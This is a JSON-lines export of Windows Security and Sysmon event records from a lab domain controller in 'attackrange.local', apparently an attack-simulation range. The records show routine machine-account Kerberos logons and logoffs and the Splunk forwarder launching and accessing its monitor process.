{"EventTime":"2020-08-01 07:59:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220673,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x94202\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50178\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x94202","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50178","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220674,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x94202\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x94202","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.645\r\nProcessGuid: {41C8662E-20EC-5F25-0000-0010FF420900}\r\nProcessId: 4612\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.645","ProcessGuid":"{41C8662E-20EC-5F25-0000-0010FF420900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20EC-5F25-0000-0010FF420900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20EC-5F25-0000-0010FF420900}","TargetProcessId":"4612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20EC-5F25-0000-0010FF420900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20EC-5F25-0000-0010FF420900}","TargetProcessId":"4612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
